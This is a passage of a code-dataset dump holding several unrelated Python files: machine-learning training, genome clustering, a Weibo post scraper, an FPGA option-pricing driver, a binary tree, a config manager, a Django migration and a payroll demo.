precision_recall_fscore_support,accuracy_score,confusion_matrix\n\nh2o.init()\n\n\ndf = h2o.import_file(\"/home/sruthi/asm-2/asm-2/1_data/bank.csv\")\ndf['Class'] = df['Class'].asfactor()\n# 
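the target must be a factor for H2O to treat this as classification rather than\n# regression; the commented lines below would likewise mark the categorical\n# predictor columns as factors, if that were desired:\n# 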
df['V2'] = df['V2'].asfactor()\n# df['V3'] = df['V3'].asfactor()\n# df['V4'] = df['V4'].asfactor()\n# df['V5'] = df['V5'].asfactor()\n# df['V7'] = df['V7'].asfactor()\n# df['V8'] = df['V8'].asfactor()\n# df['V9'] = df['V9'].asfactor()\n# df['V11'] = df['V11'].asfactor()\n# df['V16'] = df['V16'].asfactor()\ny = 'Class'\nx = df.col_names\nx.remove(y)\n\ntrain, test = df.split_frame(ratios=[.75])\n\n\n\nmodel_bank = H2OGradientBoostingEstimator(ntrees = 100, seed = 25,nfolds=5, max_depth=5,balance_classes=True)\n\n\nstart=time.time()\nmodel_bank.train(x=x, y=y, training_frame=train)\nend=time.time()\n \nt=(end-start)\n\nmodelfile = model_bank.download_mojo(path=\"/home/sruthi/asm-2/asm-2/3_pickle\", get_genmodel_jar=True)\nprint(\"Model saved to \" + modelfile)\n\npred = model_bank.predict(test)\n\n#data_train_all = pd.read_csv(\"/home/sruthi/asm-2/asm-2/1_data/bank_upsampled_train_75.csv\")\n# data_test_all=pd.read_csv(\"/home/sruthi/asm-2/asm-2/1_data/bank_upsampled_test_25.csv\")\n\n# data_train_all=pd.get_dummies(data_train_all,drop_first=False)\n# data_test_all=pd.get_dummies(data_test_all,drop_first=False)\n\n# data_train_h2o=h2o.H2OFrame(data_train_all)\n# data_test_h2o=h2o.H2OFrame(data_test_all)\n\n# data_train_h2o['Class']=data_train_h2o['Class'].asfactor()\n\n# model_bank = H2OGradientBoostingEstimator(ntrees = 50, seed = 25,nfolds=5, max_depth=5) ## Instantiating the class\n\n# model_bank.train(x=data_train_h2o.names[1:],y=data_train_h2o.names[0], training_frame=data_train_h2o, model_id=\"GBM_bank\",\n# validation_frame=data_train_h2o)\n\n# print(model_bank.cross_validation_metrics_summary())\n\n# # perf = model.model_performance()\n# # perf.mean_score()\n# x=data_train_h2o.names[1:]\n# perf = model_bank.model_performance()\na = model_bank.model_performance(test_data=test).confusion_matrix().to_list()[0][0]\nb= model_bank.model_performance(test_data=test).confusion_matrix().to_list()[0][1]\nc = model_bank.model_performance(test_data=test).confusion_matrix().to_list()[1][0]\nd = model_bank.model_performance(test_data=test).confusion_matrix().to_list()[1][1]\nrecall = d / (c+d)\nprecision = d/(b+d)\nf1 = 2*(precision * recall)/(precision + recall)\naccuracy = (a+d)/(a+b+c+d)\nmetrics = {}\nmetrics[\"Accuracy\"]=accuracy\nmetrics[\"Error\"]=1-accuracy\nmetrics[\"Precision\"]=precision\nmetrics[\"Recall\"]=recall\nmetrics[\"FScore\"]=f1\nmetrics[\"Single_training_time\"] = t\nmetrics[\"Cross_validated_Training_time\"] = t\nmetrics[\"Test_time_per_unit\"] = t/11303\nmetrics[\"Confusion_Matrix_rowstrue_colspred\"] = [a,b,c,d]\nmetrics[\"Test_File\"] = \"bank_upsampled_test_25.csv\"\nprint(\"accuracy: \",accuracy)\nprint(\"error,\",1-accuracy)\nprint(\"recall\",recall)\nprint(\"precision\",precision)\nprint(\"f1\",f1)\nprint(\"Training time: \",t) \n\nimport os,json\nif os.path.exists('/home/sruthi/asm-2/asm-2/3_pickle/GBE_bank_002.json'):\n with open('/home/sruthi/asm-2/asm-2/3_pickle/GBE_bank_002.json', 'r') as f:\n models = json.load(f)\n models[\"Metrics\"] = metrics\n with open('/home/sruthi/asm-2/asm-2/3_pickle/GBE_bank_002.json', 'w') as f:\n json.dump(models, f, indent = 2) \n\n# h2o.cluster().shutdown()","sub_path":"source-code/GBE_bank_002.py","file_name":"GBE_bank_002.py","file_ext":"py","file_size_in_byte":3502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"122780910","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport fastcluster as fc\nimport scipy.cluster.hierarchy as sch\nfrom 
scipy.cluster.hierarchy import dendrogram\nimport os.path as path\n\n\ndef printout(message):\n    # TODO : Make this a bit more colourful\n    print("GenomeDataAnalyzer : " + message)\n\n\nclass GenomeDataAnalyzer:\n    def __init__(self, filename=None):\n        self._data = None\n        self._experiments = None\n        self._experience_names = None\n        self._clusters = None\n        self._cluster_short = None\n\n        if not filename:\n            self._filename = None\n        else:\n            self.load(filename)\n\n    def load(self, filename):\n        if path.isfile(filename):\n            self._filename = filename\n            self._data = pd.read_table(filename)\n            self._clusters = None\n            printout("File " + filename + " loaded")\n            return\n\n        printout("Could not find file. Is the path correct ?")\n\n    def set_experiments_list(self, experience_names, index_start, index_end):\n        if self._data is not None:\n            self._experiments = self._data.columns[range(index_start, index_end)]\n            self._experience_names = experience_names\n            self._compute_triplicates()\n            return\n\n        print("Could not set experiment list, please load data file first")\n\n    def get_cluster_data(self, cluster_id):\n        # Get a slice of the array corresponding to a given cluster\n        # You can use a gene name (cluster that this gene belongs to), or a cluster number\n\n        if isinstance(cluster_id, str):\n            i_cluster = self._data[self._data['GeneName'] == cluster_id]['k_index'].values[0]\n            return self._data[self._data['k_index'] == i_cluster]\n\n        return self._data[self._data['k_index'] == cluster_id]\n\n    def list_genes(self):\n        if self._data is not None:\n            return self._data['GeneName']\n\n        printout("File is not loaded. Please load a data file first")\n        return\n\n    def clusterize(self, n_clusters=20, experiences_to_use=None, metric='euclidean'):\n        method = 'complete'\n\n        # explicit None check: truth-testing a numpy linkage matrix raises ValueError\n        if self._clusters is None:\n            printout("Computing clusters")\n\n            if experiences_to_use:\n                cols = experiences_to_use\n            else:\n                cols = self._experience_names\n\n            # - run the hierarchical clustering, then crop to n clusters\n            exp_data = self._data.select(lambda x: x in cols, axis=1)\n            self._clusters = fc.linkage(exp_data, method=method, metric=metric)\n\n        self._cluster_short = sch.fcluster(self._clusters, n_clusters, criterion='maxclust')\n        self._data["k_index"] = pd.Series(self._cluster_short, index=self._data[self._experience_names].index)\n        printout("Data clustered - " + str(n_clusters) + " clusters selected")\n\n    def plot_dendrogram(self, save_figure=False, filename=None):\n        # TODO: Handle options\n        # plot the linkage matrix computed in clusterize()\n        dendrogram(self._clusters)\n        plt.show()\n\n    def plot_gene_cluster(self, gene_name):\n        if self._clusters is None:\n            self.clusterize()\n\n        gene_friends = self.get_cluster_data(gene_name)\n\n        for _i in range(len(gene_friends['GeneName'].values)):\n            plt.plot(gene_friends[self._experience_names].values[_i, :], label=gene_friends['GeneName'].values[_i])\n\n        plt.legend()\n        plt.xticks(np.arange(len(self._experience_names)), self._experience_names, rotation=25)\n        plt.grid(True)\n        plt.title(gene_name + " cluster")\n        plt.show()\n\n    def _compute_triplicates(self):\n        printout("Computing triplicates")\n        n_real_experiments = int(len(self._experiments)/3)\n\n        for i in range(n_real_experiments):\n            self._data[self._experience_names[i]] = self._data[self._experiments[3*i:3*i+3]].apply(self._log_mean, axis=1)\n\n            names = [name for name in self._experiments[3*i:3*i+3]]\n            printout("Data points " + str(names) + " averaged - Corresponds to experience: " + self._experience_names[i])\n\n    @staticmethod\n    def _log_mean(log_values):\n        exp_values = np.exp2(log_values)\n        return 
np.log2(np.mean(exp_values))\n\n","sub_path":"DNA Processing/analyzer.py","file_name":"analyzer.py","file_ext":"py","file_size_in_byte":4198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"282483626","text":"# python 3.6.5\n'''\nWeibo has uesd an encoded url link when a new page was refreshed.\nIt was showed below:\nRequest URL: https://m.weibo.cn/api/container/getIndex?type=uid&value=2649634977&containerid=1005052649634977\nand loading more lists '&since_id=4253870366193901' was added to the end of the url.\nthe 'since_id' is no rule to follow.\nBut a few year ago, '&page=1' is same as the '&since_id=1234567890'\nSo the script work well.\n\n'''\nimport requests\nfrom urllib.parse import urlencode\n\nheaders = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36',\n 'Referer': 'https://m.weibo.cn/u/2649634977',\n 'X-Requested-With': 'XMLHttpRequest'\n }\n\n\ndef download(page_index):\n data = {\n 'type': 'uid',\n 'value': '2649634977',\n 'containerid': '1076032649634977',\n 'page': page_index\n }\n url = 'https://m.weibo.cn/api/container/getIndex?' + urlencode(data)\n try:\n re = requests.get(url, headers=headers)\n if re.status_code == 200:\n return re.json()\n except requests.ConnectionError as e:\n print(f'this is a error {e.args} when getting {url}')\n\n\ndef parsing(json):\n if json:\n items = json.get('data').get('cards')\n for item in items:\n item = item.get('mblog')\n weibo = {}\n weibo['id'] = item.get('id')\n weibo['created time'] = item.get('created_at')\n weibo['content'] = item.get('raw_text')\n weibo['comment'] = item.get('comments_count')\n yield weibo\n\n\nif __name__ == '__main__':\n for page in range(1, 3):\n json = download(page)\n rslt = parsing(json)\n for item in rslt:\n print(item)\n","sub_path":"my_weibo_account.py","file_name":"my_weibo_account.py","file_ext":"py","file_size_in_byte":1792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"98946630","text":"from pynq import DefaultIP\nfrom pynq import Overlay\nfrom pynq import Xlnk\nimport numpy as np\nimport datetime\n\nclass BinomialTreeDriver(DefaultIP):\n def __init__(self, description):\n super().__init__(description=description)\n\n bindto = ['xilinx.com:hls:binomial_tree:1.0']\n\n @property\n def status(self):\n return self.read(0x00)\n \n @status.setter\n def status(self, value):\n self.write(0x00, value)\n\n @property\n def output(self):\n return self.read(0x10)\n\n @output.setter\n def output(self, value):\n self.write(0x10, value)\n\n @property\n def spot_price(self):\n return self.read(0x18)\n\n @spot_price.setter\n def spot_price(self, value):\n self.write(0x18, value)\n\n @property\n def strike_price(self):\n return self.read(0x20)\n\n @strike_price.setter\n def strike_price(self, value):\n self.write(0x20, value)\n\n @property\n def time_to_maturity(self):\n return self.read(0x28)\n\n @time_to_maturity.setter\n def time_to_maturity(self, value):\n self.write(0x28, value)\n\n @property\n def dividend_yield(self):\n return self.read(0x30)\n\n @dividend_yield.setter\n def dividend_yield(self, value):\n self.write(0x30, value)\n \n @property\n def risk_free_rate(self):\n return self.read(0x38)\n\n @risk_free_rate.setter\n def risk_free_rate(self, value):\n self.write(0x38, value)\n\n @property\n def volatility(self):\n return self.read(0x40)\n\n @volatility.setter\n def volatility(self, value):\n 
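# MMIO write into the core's 0x40 control slot; the hex offsets used by these\n        # properties presumably come from the AXI-Lite register map that Vivado HLS\n        # generated for this IP\n        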
self.write(0x40, value)\n\n    @property\n    def type_r(self):\n        return self.read(0x48)\n    \n    @type_r.setter\n    def type_r(self, value):\n        self.write(0x48, value)\n\n    @property\n    def height(self):\n        return self.read(0x50)\n    \n    @height.setter\n    def height(self, value):\n        self.write(0x50, value)\n    \n    @property\n    def n_options(self):\n        return self.read(0x58)\n    \n    @n_options.setter\n    def n_options(self, value):\n        self.write(0x58, value)\n\n# Load bitstream\nt0 = datetime.datetime.now()\noverlay = Overlay("./overlay/us_binomial_tree.bit")\nBinomialTree = overlay.binomial_tree\nt1 = datetime.datetime.now()\n\n# Time taken in seconds\ndelta = t1 - t0\nprint("Loaded bitstream in (seconds): ", (delta.microseconds / 1000000) + delta.seconds)\n\n# Load option data\noption_data = np.loadtxt("option_data.txt", comments="#", delimiter=",", unpack=False)\n\n# Allocate memory\nxlnk = Xlnk()\nif(option_data.ndim > 1):\n    n_options = len(option_data)\n    \n    if n_options > 25:\n        n_options = 25\nelse:\n    n_options = 1\n\n# Allocate memory\noutput = xlnk.cma_array(shape=(n_options), dtype=np.float32)\nS = xlnk.cma_array(shape=(n_options), dtype=np.float32)\nK = xlnk.cma_array(shape=(n_options), dtype=np.float32)\nT = xlnk.cma_array(shape=(n_options), dtype=np.float32)\nD = xlnk.cma_array(shape=(n_options), dtype=np.float32)\nr = xlnk.cma_array(shape=(n_options), dtype=np.float32)\nv = xlnk.cma_array(shape=(n_options), dtype=np.float32)\ntype_r = xlnk.cma_array(shape=(n_options), dtype=np.int32)\nheight = xlnk.cma_array(shape=(n_options), dtype=np.int32)\n\nprint("Number of options: ", n_options)\n\n# Read in option data, clamping the tree height to the supported range [2, 30000]\nif(option_data.ndim > 1): # 2 or more options\n    for i in range(n_options):\n        S[i] = option_data[i][0]\n        K[i] = option_data[i][1]\n        T[i] = option_data[i][2]\n        D[i] = option_data[i][3]\n        r[i] = option_data[i][4]\n        v[i] = option_data[i][5]\n        type_r[i] = option_data[i][6]\n        if(option_data[i][7] > 30000):\n            height[i] = 30000\n        elif(option_data[i][7] < 2):\n            height[i] = 2\n        else:\n            height[i] = option_data[i][7]\nelse: # 1 option\n    S[0] = option_data[0]\n    K[0] = option_data[1]\n    T[0] = option_data[2]\n    D[0] = option_data[3]\n    r[0] = option_data[4]\n    v[0] = option_data[5]\n    type_r[0] = option_data[6]\n    if(option_data[7] > 30000):\n        height[0] = 30000\n    elif(option_data[7] < 2):\n        height[0] = 2\n    else:\n        height[0] = option_data[7]\n\n# Define status codes\nap_start = 1\nap_done = 2\nap_idle = 4\nap_ready = 8\n\n# Transfer data to FPGA\nBinomialTree.output = output.physical_address\nBinomialTree.spot_price = S.physical_address\nBinomialTree.strike_price = K.physical_address\nBinomialTree.time_to_maturity = T.physical_address\nBinomialTree.dividend_yield = D.physical_address\nBinomialTree.risk_free_rate = r.physical_address\nBinomialTree.volatility = v.physical_address\nBinomialTree.type_r = type_r.physical_address\nBinomialTree.height = height.physical_address\nBinomialTree.n_options = n_options\n\nt0 = datetime.datetime.now()\nstatus = 0\n\n# Run IP on FPGA\nif (BinomialTree.status == ap_idle) or (BinomialTree.status == ap_ready):\n    BinomialTree.status = ap_start\n    \n    while(status != ap_idle):\n        status = BinomialTree.status\n\nt1 = datetime.datetime.now()\n\n# Time taken in seconds\ndelta = t1 - t0\nprint("Time taken (seconds): ", (delta.microseconds / 1000000) + delta.seconds)\nprint(output)\n","sub_path":"MSc Project/Binomial 
Tree/American/PYNQ-Z2/usbinomialtree.py","file_name":"usbinomialtree.py","file_ext":"py","file_size_in_byte":5095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} {"seq_id":"226196296","text":"class Height(object):\n    def __init__(self):\n        self.height = 0\n\n\nclass NodeBt(object):\n    def __init__(self, value=None, level=1):\n        self.value = value\n        self.level = level\n        self.left = None\n        self.right = None\n\n    def __repr__(self):\n        return "{}".format(self.value)\n\n    def _add_next_node(self, value, level_here=2):\n        new_node = NodeBt(value, level_here)\n        if not self.value:\n            self.value = new_node\n        elif not self.left:\n            self.left = new_node\n        elif not self.right:\n            self.right = new_node\n        else:\n            self.left = self.left._add_next_node(value, level_here+1)\n        return self\n\n    def _search_for_node(self, value):\n        if self.value == value:\n            return self\n        else:\n            found = None\n            if self.left:\n                found = self.left._search_for_node(value)\n            if self.right:\n                # search the right subtree as well (not the left one twice)\n                found = found or self.right._search_for_node(value)\n            return found\n\n    def _is_leaf(self):\n        return not self.right and not self.left\n\n    def _get_max_height(self):\n        heightr, heightl = 0, 0\n        if self.right:\n            heightr = self.right._get_max_height()+1\n        if self.left:\n            heightl = self.left._get_max_height()+1\n        return max(heightl, heightr)\n\n    def _is_balanced(self, height=Height()):\n        lh = Height()\n        rh = Height()\n        if self.value is None:\n            return True\n        l, r = True, True\n        if self.left:\n            l = self.left._is_balanced(lh)\n        if self.right:\n            r = self.right._is_balanced(rh)\n        height.height = max(lh.height, rh.height) + 1\n        if abs(lh.height-rh.height) <= 1:\n            return l and r\n        return False\n\n    def _is_bst(self, left=None, right=None):\n        if self.value:\n            # the node's value must respect the bounds inherited from its ancestors\n            if left and self.value < left:\n                return False\n            if right and self.value > right:\n                return False\n\n            l, r = True, True\n            if self.left:\n                l = self.left._is_bst(left, self.value)\n            if self.right:\n                r = self.right._is_bst(self.value, right)\n            return l and r\n        else:\n            return True\n\nclass BinaryTree(object):\n    def __init__(self):\n        self.root = None\n\n    def add_node(self, value):\n        if not self.root:\n            self.root = NodeBt(value)\n        else:\n            self.root._add_next_node(value)\n\n    def is_leaf(self, value):\n        node = self.root._search_for_node(value)\n        if node:\n            return node._is_leaf()\n        else:\n            return False\n\n    def get_node_level(self, value):\n        node = self.root._search_for_node(value)\n        if node:\n            return node.level\n        else:\n            return False\n\n    def is_root(self, value):\n        return self.root.value == value\n\n    def get_height(self):\n        return self.root._get_max_height()\n\n    def is_balanced(self):\n        return self.root._is_balanced()\n\n    def is_bst(self):\n        return self.root._is_bst()\n\nif __name__ == "__main__":\n    bt = BinaryTree()\n    for i in range(1, 10):\n        bt.add_node(i)\n    print("Is node 8 a leaf node?", bt.is_leaf(8))\n    print("What is the level of node 8?", bt.get_node_level(8))\n    print("Is node 10 the root node?", bt.is_root(10))\n    print("Is node 1 the root node?", bt.is_root(1))\n    print("What is the height of the tree?", bt.get_height())\n    print("Is this a binary search tree?", bt.is_bst())\n    print("Is this a balanced tree?", bt.is_balanced())\n\n","sub_path":"풀었던 문제들/binary_tree.py","file_name":"binary_tree.py","file_ext":"py","file_size_in_byte":3650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} {"seq_id":"432152602","text":"# -*- Mode: Python; indent-tabs-mode: t; python-indent: 4; tab-width: 4 -*-\n\nimport os\nimport shutil\n\nfrom configparser import ConfigParser\nfrom gi.repository import Gdk\nfrom cavalcade.logger import logger\nfrom 
cavalcade.common import AttributeDict, WINDOW_HINTS, AccelCheck\n\nGTK_WINDOW_TYPE_HINTS = [getattr(Gdk.WindowTypeHint, hint) for hint in WINDOW_HINTS]\nDEFAULT_WALLPAPER_FILE = \"DefaultWallpaper.svg\"\naccel = AccelCheck()\n\n\ndef str_to_rgba(hex_):\n\t\"\"\"Translate color from hex string to Gdk.RGBA\"\"\"\n\tpure_hex = hex_.lstrip(\"#\")\n\tnums = [int(pure_hex[i:i + 2], 16) / 255.0 for i in range(0, 7, 2)]\n\treturn Gdk.RGBA(*nums)\n\n\ndef rgba_to_str(rgba):\n\t\"\"\"Translate color from Gdk.RGBA to hex format\"\"\"\n\treturn \"#%02X%02X%02X%02X\" % tuple(int(getattr(rgba, name) * 255) for name in (\"red\", \"green\", \"blue\", \"alpha\"))\n\n\nclass ConfigBase(dict):\n\t\"\"\"Base for config manager\"\"\"\n\tsystem_location = (os.path.join(os.path.dirname(os.path.abspath(__file__)), \"data\"),)\n\tpath = os.path.expanduser(\"~/.config/cavalcade\")\n\n\tdef __init__(self, name, pattern=None):\n\t\tsuper().__init__()\n\t\tself.name = name\n\t\tself.pattern = pattern if pattern is not None else {}\n\t\tself.is_fallback = False\n\n\t\t# read functions\n\t\tself.reader = {\n\t\t\tint: lambda section, option: self.parser.getint(section, option),\n\t\t\tbool: lambda section, option: self.parser.getboolean(section, option),\n\t\t\tstr: lambda section, option: self.parser.get(section, option),\n\t\t\tfloat: lambda section, option: self.parser.getfloat(section, option),\n\t\t\t\"ilist\": lambda section, option: [int(v.strip()) for v in self.parser.get(section, option).split(\";\")],\n\t\t\t\"hint\": lambda section, option: getattr(Gdk.WindowTypeHint, self.parser.get(section, option)),\n\t\t\t\"accel\": lambda section, option: self.parser.get(section, option),\n\t\t\tGdk.RGBA: lambda section, option: str_to_rgba(self.parser.get(section, option)),\n\t\t}\n\n\t\t# write functions\n\t\tself.writer = {\n\t\t\tint: lambda value: str(value),\n\t\t\tbool: lambda value: str(int(value)),\n\t\t\tstr: lambda value: value,\n\t\t\tfloat: lambda value: \"{:.2f}\".format(value),\n\t\t\t\"ilist\": lambda value: \";\".join(str(i) for i in value),\n\t\t\t\"hint\": lambda value: value.value_nick.upper(),\n\t\t\t\"accel\": lambda value: value,\n\t\t\tGdk.RGBA: lambda value: rgba_to_str(value),\n\t\t}\n\n\t\t# init\n\t\tself._init_config_file()\n\t\tself._load_config_file()\n\n\tdef _init_config_file(self):\n\t\t\"\"\"Setup user config directory and file\"\"\"\n\t\tfor path in self.system_location:\n\t\t\tcandidate = os.path.join(path, self.name)\n\t\t\tif os.path.isfile(candidate):\n\t\t\t\tself.defconfig = candidate\n\t\t\t\tbreak\n\n\t\tif not os.path.exists(self.path):\n\t\t\tos.makedirs(self.path)\n\n\t\tself.file = os.path.join(self.path, self.name)\n\n\t\tif not os.path.isfile(self.file):\n\t\t\tshutil.copyfile(self.defconfig, self.file)\n\t\t\tlogger.info(\"New configuration file was created:\\n%s\" % self.file)\n\n\tdef _load_config_file(self):\n\t\t\"\"\"Read raw config data\"\"\"\n\t\tself.parser = ConfigParser()\n\t\ttry:\n\t\t\tself.parser.read(self.file)\n\t\t\tself.read_data()\n\t\t\tlogger.debug(\"User config '%s' successfully loaded.\" % self.name)\n\t\texcept Exception:\n\t\t\tself.is_fallback = True\n\t\t\tlogger.exception(\"Fail to read '%s' user config:\" % self.name)\n\t\t\tlogger.info(\"Trying with default config...\")\n\t\t\tself.parser.read(self.defconfig)\n\t\t\tself.read_data()\n\t\t\tlogger.debug(\"Default config '%s' successfully loaded.\" % self.name)\n\n\tdef read_data(self):\n\t\t\"\"\"Transform raw config data to user specified types\"\"\"\n\t\tfor section in 
self.pattern.keys():\n\t\t\tself[section] = dict()\n\t\t\tfor option, pattern in self.pattern[section].items():\n\t\t\t\treader = self.reader[pattern.type]\n\t\t\t\tself[section][option] = reader(section, option)\n\t\t\t\tif \"valid\" in pattern and self[section][option] not in pattern.valid:\n\t\t\t\t\traise Exception(\"Bad value for '%s' in '%s'\" % (option, section))\n\n\tdef write_data(self):\n\t\t\"\"\"Transform user specified data to raw config parser strings\"\"\"\n\t\tfor section in self.pattern.keys():\n\t\t\tfor option, pattern in self.pattern[section].items():\n\t\t\t\twriter = self.writer[pattern.type]\n\t\t\t\tself.parser[section][option] = writer(self[section][option])\n\n\tdef save_data(self):\n\t\t\"\"\"Save settings to file\"\"\"\n\t\twith open(self.file, 'w') as configfile:\n\t\t\tself.parser.write(configfile)\n\n\nclass CavaConfig(ConfigBase):\n\t\"\"\"CAVA config manager\"\"\"\n\tdef __init__(self):\n\t\tsuper().__init__(\n\t\t\t\"cava.ini\", dict(\n\t\t\t\tgeneral = dict(\n\t\t\t\t\tbars = AttributeDict(type=int),\n\t\t\t\t\tsensitivity = AttributeDict(type=int),\n\t\t\t\t\tframerate = AttributeDict(type=int),\n\t\t\t\t\tlower_cutoff_freq = AttributeDict(type=int),\n\t\t\t\t\thigher_cutoff_freq = AttributeDict(type=int),\n\t\t\t\t\tautosens = AttributeDict(type=bool),\n\t\t\t\t),\n\t\t\t\toutput = dict(\n\t\t\t\t\tmethod = AttributeDict(type=str, valid=[\"raw\"]),\n\t\t\t\t\traw_target = AttributeDict(type=str),\n\t\t\t\t\tchannels = AttributeDict(type=str),\n\t\t\t\t\tbit_format = AttributeDict(type=str, valid=[\"16bit\", \"8bit\"]),\n\t\t\t\t),\n\t\t\t\tsmoothing = dict(\n\t\t\t\t\tgravity = AttributeDict(type=int),\n\t\t\t\t\tintegral = AttributeDict(type=int),\n\t\t\t\t\tignore = AttributeDict(type=int),\n\t\t\t\t\tmonstercat = AttributeDict(type=bool),\n\t\t\t\t),\n\t\t\t)\n\t\t)\n\n\tdef read_data(self):\n\t\tsuper().read_data()\n\t\tself[\"eq\"] = [float(v) for v in self.parser[\"eq\"].values()]\n\n\tdef write_data(self):\n\t\tsuper().write_data()\n\n\t\tfor i, key in enumerate(self.parser[\"eq\"].keys()):\n\t\t\tself.parser[\"eq\"][key] = \"{:.2f}\".format(self[\"eq\"][i])\n\n\t\tself.save_data()\n\n\nclass MainConfig(ConfigBase):\n\t\"\"\"Main application config manager\"\"\"\n\tdef __init__(self):\n\t\tsuper().__init__(\n\t\t\t\"main.ini\", dict(\n\t\t\t\tdraw = dict(\n\t\t\t\t\tpadding = AttributeDict(type=int),\n\t\t\t\t\tzero = AttributeDict(type=int),\n\t\t\t\t\tsilence = AttributeDict(type=int),\n\t\t\t\t\tscale = AttributeDict(type=float),\n\t\t\t\t),\n\t\t\t\tcolor = dict(\n\t\t\t\t\tfg = AttributeDict(type=Gdk.RGBA),\n\t\t\t\t\tautofg = AttributeDict(type=Gdk.RGBA),\n\t\t\t\t\tbg = AttributeDict(type=Gdk.RGBA),\n\t\t\t\t\tauto = AttributeDict(type=bool),\n\t\t\t\t),\n\t\t\t\toffset = dict(\n\t\t\t\t\tleft = AttributeDict(type=int),\n\t\t\t\t\tright = AttributeDict(type=int),\n\t\t\t\t\ttop = AttributeDict(type=int),\n\t\t\t\t\tbottom = AttributeDict(type=int),\n\t\t\t\t),\n\t\t\t\twindow = dict(\n\t\t\t\t\tmaximize = AttributeDict(type=bool),\n\t\t\t\t\tbelow = AttributeDict(type=bool),\n\t\t\t\t\tstick = AttributeDict(type=bool),\n\t\t\t\t\twinbyscreen = AttributeDict(type=bool),\n\t\t\t\t\timagebyscreen = AttributeDict(type=bool),\n\t\t\t\t\tbgpaint = AttributeDict(type=bool),\n\t\t\t\t\tfullscreen = AttributeDict(type=bool),\n\t\t\t\t\tskiptaskbar = AttributeDict(type=bool),\n\t\t\t\t),\n\t\t\t\timage = dict(\n\t\t\t\t\tshow = AttributeDict(type=bool),\n\t\t\t\t\tusetag = AttributeDict(type=bool),\n\t\t\t\t\tva = 
AttributeDict(type=bool),\n\t\t\t\t\tha = AttributeDict(type=bool),\n\t\t\t\t\tdefault = AttributeDict(type=str)\n\t\t\t\t),\n\t\t\t\tautocolor = dict(\n\t\t\t\t\tbands = AttributeDict(type=int),\n\t\t\t\t\twindow = AttributeDict(type=int),\n\t\t\t\t\tsaturation_min = AttributeDict(type=float),\n\t\t\t\t\tvalue_min = AttributeDict(type=float),\n\t\t\t\t\tisize = AttributeDict(type=\"ilist\"),\n\t\t\t\t),\n\t\t\t\tplayer = dict(\n\t\t\t\t\tvolume = AttributeDict(type=float),\n\t\t\t\t\tshuffle = AttributeDict(type=bool),\n\t\t\t\t\tshowqueue = AttributeDict(type=bool),\n\t\t\t\t),\n\t\t\t\tmisc = dict(\n\t\t\t\t\thint = AttributeDict(type=\"hint\", valid=GTK_WINDOW_TYPE_HINTS),\n\t\t\t\t\tdsize = AttributeDict(type=\"ilist\"),\n\t\t\t\t\tcursor_hide_timeout = AttributeDict(type=int),\n\n\t\t\t\t),\n\t\t\t\tkeys = dict(\n\t\t\t\t\texit = AttributeDict(type=\"accel\", valid=accel),\n\t\t\t\t\tnext = AttributeDict(type=\"accel\", valid=accel),\n\t\t\t\t\tplay = AttributeDict(type=\"accel\", valid=accel),\n\t\t\t\t\tshow = AttributeDict(type=\"accel\", valid=accel),\n\t\t\t\t\thide = AttributeDict(type=\"accel\", valid=accel),\n\t\t\t\t),\n\t\t\t)\n\t\t)\n\n\tdef read_data(self):\n\t\tsuper().read_data()\n\t\tself._validate_default_bg()\n\n\tdef _validate_default_bg(self):\n\t\tif not self[\"image\"][\"default\"]:\n\t\t\tlogger.info(\"Default wallpaper not defined, setting config option to fallback value.\")\n\t\t\tself._set_fallback_bg()\n\t\telif not os.path.isfile(self[\"image\"][\"default\"]):\n\t\t\tlogger.warning(\"Default wallpaper file not valid, resetting config option to fallback value.\")\n\t\t\tself._set_fallback_bg()\n\n\tdef _set_fallback_bg(self):\n\t\tself[\"image\"][\"default\"] = os.path.join(os.path.dirname(self.defconfig), DEFAULT_WALLPAPER_FILE)\n\n\tdef write_data(self):\n\t\tsuper().write_data()\n\t\tself.save_data()\n","sub_path":"cavalcade/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":8080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"652798885","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('lti_permissions', '0001_initial'),\n ]\n\n operations = [\n migrations.RunSQL(\n sql=\"INSERT INTO lti_permissions_ltipermission \"\n \"(permission, school_id, canvas_role, allow) \"\n \"VALUES ('manage_courses', '*', 'AccountAdmin', '1'),\"\n \"('manage_courses', '*', 'Account Admin', '1'),\"\n \"('manage_courses', '*', 'Account admin', '1'),\"\n \"('manage_courses', '*', 'SchoolLiaison', '1');\",\n reverse_sql=\"delete from lti_permissions_ltipermission where permission='manage_courses';\",\n ),\n ]\n\n","sub_path":"canvas_site_creator/migrations/0001_insert_lti_permissions.py","file_name":"0001_insert_lti_permissions.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"139936941","text":"from employee import SalaryEmployee, HourlyEmployee, CommissionEmployee\nfrom payroll import PayrollSystem\n\n\ndef run():\n salary_employee = SalaryEmployee(1, 'John Smith', 1500)\n hourly_employee = HourlyEmployee(2, 'John Dee', 40, 15)\n commission_employee = CommissionEmployee(3, 'Kevin Bacon', 1000, 250)\n payroll_system = PayrollSystem()\n payroll_system.calculate_payroll([\n salary_employee,\n hourly_employee,\n commission_employee,\n ])\n\n\nif __name__ == '__main__':\n 
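# run() hands three different employee types to PayrollSystem.calculate_payroll;\n    # the system presumably only needs each object to expose calculate_payroll(),\n    # so further employee types could be added without changing it\n    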
